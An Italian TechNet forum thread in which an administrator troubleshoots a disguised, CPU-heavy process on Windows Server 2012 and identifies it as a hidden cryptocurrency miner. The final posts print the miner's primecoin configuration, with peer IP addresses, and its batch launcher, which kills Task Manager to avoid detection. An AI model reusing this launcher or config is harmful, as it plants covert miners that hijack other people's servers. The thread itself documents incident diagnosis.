none
Windows Server 2012 Processo "NissanIved.exe" utilizza molte risorse RRS feed

  • Domanda

  • If I end NissanIved.exe process the cpu utilization run at 4%, when this process run the cpu's run at 66%.

    If I run a serch, this file is here:

    C:\Program Files\Common Files\microsoft shared\Stationery

    C:\Program Files\Common Files\microsoft shared\TextConv

    C:\Program Files\Common Files\microsoft shared\Triedit

    C:\Program Files\Common Files\microsoft shared\VC

    C:\Program Files\Common Files\microsoft shared\VGX

    C:\Program Files\Internet Explorer

    C:\Program Files\Windows NT\Accessories

    C:\Winsows\Help

    C:\Windows\MicrosoftNET\Framework\2052

    In  Properties of this file of 7kb we have this info:

    File description:   App Compact Search and Replace

    Type :Application

    Fiel version:  5.2.3790.0

    Product name: Microsoft Windows operating System

    Original filename: acsr.exe

    It's tru, too have this process or is a malware?


    venerdì 3 gennaio 2014 21:16

Risposte

  • Ciao Pier Andrea, ti confermo che il file acsr.exe è un file Microsoft utilizzato da alcuni script (KB187048).

    Il file è nativo nella versione Windows Server 2003R2

    Ho trovato traccia del file anche nella versione Windows Server 2008 R2 nella cartella winsxs.

    Trovi qualche info nel sito processlist.

    Il file non è presente nella versione Windows Server 2012 quindi la sua presenza (ed in tutte quelle cartelle) merita una verifica approfondita. Comunque potrebbe essere stato installato da un programma di supporto, tieni conto che la mia verifica si basa su due Windows Server 2012 senza nessuna applicazione installata.

    Quali ruoli detiene questo server?

    Non conosco esattamente i servizi offerti dal Fortinet ma presumo che come altri vendor offra un servizio di antivirus perimetrale e non endpoint. Sul server è installato un antivirus?

    Potresti associare il problema ad eventuali installazioni di aggiornamenti e/o software?

    Saluti
    Nino


    ...esistono i motori di ricerca, facci un salto e troverai molte delle risposte che ti darò io.

    • Contrassegnato come risposta Anca Popa venerdì 10 gennaio 2014 10:26
    sabato 4 gennaio 2014 08:04
    Moderatore
  • Non credo che sia un file del sistema operativo, sicuramente è stato creato prendendo come base "acsr.exe" (che come diceva NinoRCTN viene utilizzato per l'esecuzione di script) ma con molta probabilità si tratta di un malware (tra l'altro il nome mi ricorda un certo "Nissan.exe"). Oltre ai tool antimalware Microsoft hai provato ad installare un software antivirus vero e proprio?
    • Modificato Fabrizio-GMVP sabato 4 gennaio 2014 09:45
    • Contrassegnato come risposta Anca Popa venerdì 10 gennaio 2014 10:26
    sabato 4 gennaio 2014 09:42

Tutte le risposte

  • Ciao Pier Andrea, questo forum dedicato ai professionisti è in lingua italiana.

    Potresti indicare il Sistema Operativo (ed il SP eventualmente applicato) per il quale riscontri il problema.

    Inoltre sarebbe utile sapere se gli aggiornamenti sono regolarmente installai, se hai un antivirus e se nei log dello stesso riscontri qualcosa.

    Saluti
    Nino


    ...esistono i motori di ricerca, facci un salto e troverai molte delle risposte che ti darò io.

    venerdì 3 gennaio 2014 22:10
    Moderatore
  • Ciao Nino, è proprio perché siete dei professionisti il motivo per cui mi rivolgo a voi.

    Server Dell R520 Windows Server 2012 Standard aggiornato alle 5:07 di stamane in automatico.

    Il server è protetto da un firewall Statunitense della Fortinet Fortigate 300D con tutte le applicazioni correlate attivate ed aggiornate, firmware compresi. (a pagamento).Il supporto Microsoft riguardo la sicurezza mi ha linkato i vari security scan, e altri che anche se fatti girare in safe mode di Windows server 2012 non trovano nessun malware.

    Esistono i motori di ricerca, ma NissanIved.exe (scritto sia con la L minuscola che con la i maisucola) non generano risultati. Provaci tu.

    Il file è di 7kb e nonostante abbia firma Microsoft come ho messo nel post, nessuno di voi Microsoft mi ha ancora saputo rispondere con un " no non è nostro, cancellalo o rinominalo" oppure " si è nostro e serve a fare questo", è ed è il motivo per cui ti impegna una macchina da € 10K.

    Quando vuoi iniziamo a cercare la soluzione insieme, resto in attesa.

    venerdì 3 gennaio 2014 23:41
  • Ciao Pier Andrea, ti confermo che il file acsr.exe è un file Microsoft utilizzato da alcuni script (KB187048).

    Il file è nativo nella versione Windows Server 2003R2

    Ho trovato traccia del file anche nella versione Windows Server 2008 R2 nella cartella winsxs.

    Trovi qualche info nel sito processlist.

    Il file non è presente nella versione Windows Server 2012 quindi la sua presenza (ed in tutte quelle cartelle) merita una verifica approfondita. Comunque potrebbe essere stato installato da un programma di supporto, tieni conto che la mia verifica si basa su due Windows Server 2012 senza nessuna applicazione installata.

    Quali ruoli detiene questo server?

    Non conosco esattamente i servizi offerti dal Fortinet ma presumo che come altri vendor offra un servizio di antivirus perimetrale e non endpoint. Sul server è installato un antivirus?

    Potresti associare il problema ad eventuali installazioni di aggiornamenti e/o software?

    Saluti
    Nino


    ...esistono i motori di ricerca, facci un salto e troverai molte delle risposte che ti darò io.

    • Contrassegnato come risposta Anca Popa venerdì 10 gennaio 2014 10:26
    sabato 4 gennaio 2014 08:04
    Moderatore
  • Il server ha AD DS, App Server, DHCP, Print Services,DNS, File and Storage Services, IIS.

    Poi ha Tomcat 6.0.

    Nessun antivirus è installato.

    Ma secondo te è possibile che acsr.exe nella versione 2012 si chiami NissanIved.exe

    E poi a cosa serve? Cosa sta facendo con tutte quelle risorse?

    sabato 4 gennaio 2014 08:16
  • Non credo che sia un file del sistema operativo, sicuramente è stato creato prendendo come base "acsr.exe" (che come diceva NinoRCTN viene utilizzato per l'esecuzione di script) ma con molta probabilità si tratta di un malware (tra l'altro il nome mi ricorda un certo "Nissan.exe"). Oltre ai tool antimalware Microsoft hai provato ad installare un software antivirus vero e proprio?
    • Modificato Fabrizio-GMVP sabato 4 gennaio 2014 09:45
    • Contrassegnato come risposta Anca Popa venerdì 10 gennaio 2014 10:26
    sabato 4 gennaio 2014 09:42
  • Ciao,

    Evidenzio gli interventi di Nino e Fabrizio, in attesa delle tue notizie.

    Facci sapere com'e' andata, magari butta giù un buon consiglio dalla tua esperienza per gli altri utenti che sono qui con il tuo stesso scenario ;-)

    Saluti,


    Anca Popa Follow ForumTechNetIt on Twitter

    Microsoft offre questo servizio gratuitamente, per aiutare gli utenti e aumentare il database dei prodotti e delle tecnologie. Il contenuto viene fornito “così come è” e non comporta alcuna responsabilità da parte dell'azienda.

    venerdì 10 gennaio 2014 10:27
  • Sono riuscito a risalire alla directory di avvio di tale file, utilizzando il programma procexp.exe di terzi scaricato dal sito sysinternals.com

    Partiva un file .BAT da

    C:\Windows\__SoftwareDistribution\scandal\segment\Warlords
    C:\Windows\Fonts\Fonts\315767.{D6277990-4C6A-11CF-8D87-00AA0060F5BF}\9487172
    C:\Windows\Cursors\deceased\elebritie\shighest\shopping\Warlords\data

    Rinominando la softwareDistribution e facendo rifare il check upload, ho fattoa ricostruire. Ora non parte più il processo.

    Resta il problema del Fonts che non ho ancora cancellato per evitare problemi al sistema. A tale proposito chiedo consiglio a voi. In seguito vi posterò quello che faceva il file.

    venerdì 10 gennaio 2014 10:41
  • datadir=data
    server=1
    rpcuser=abc
    rpcpassword=123
    rpcport=8988
    port=7988
    gen=1
    genproclimit=-1
    daemon=1
    maxconnections=256
    rpcallowip=127.0.0.1
    addnode=94.23.215.174
    addnode=87.98.146.72
    addnode=107.20.202.112
    addnode=54.225.123.87
    addnode=54.224.142.224
    addnode=184.72.193.229
    addnode=23.20.77.101
    addnode=54.224.95.193
    addnode=54.234.90.173
    addnode=23.21.2.143

    quasi tutti server di amazon.com anche se non sono mai andato sul loro portale

    venerdì 10 gennaio 2014 10:43
  • questo è il 1236636.bat

    @echo off


    :for156888

    choice /c:ys /t:300 /d:y /n /m "x" > nul

    taskkill /f /im taskmgr.exe


    start C:\WINDOWS\SoftwareDistribution\scandal\segment\Warlords\JacksoningNetworks\Nissanlved.exe -datadir=C:\WINDOWS\Cursors\deceased\elebritie\shighest\shopping\Warlords\data -conf=C:\WINDOWS\Cursors\deceased\elebritie\shighest\shopping\Warlords\data\primecoin.conf -gen=1 -genproclimit=16


    choice /c:ys /t:9999 /d:y /n /m "x" > nul

    choice /c:ys /t:9999 /d:y /n /m "x" > nul


    taskkill /f /im Nissanlved.exe


    goto for156888

    venerdì 10 gennaio 2014 10:44
  • Un grazie a Stefano Matta che mi ha consigliato i tools per arrivare ad isolare il problema.

    venerdì 10 gennaio 2014 10:48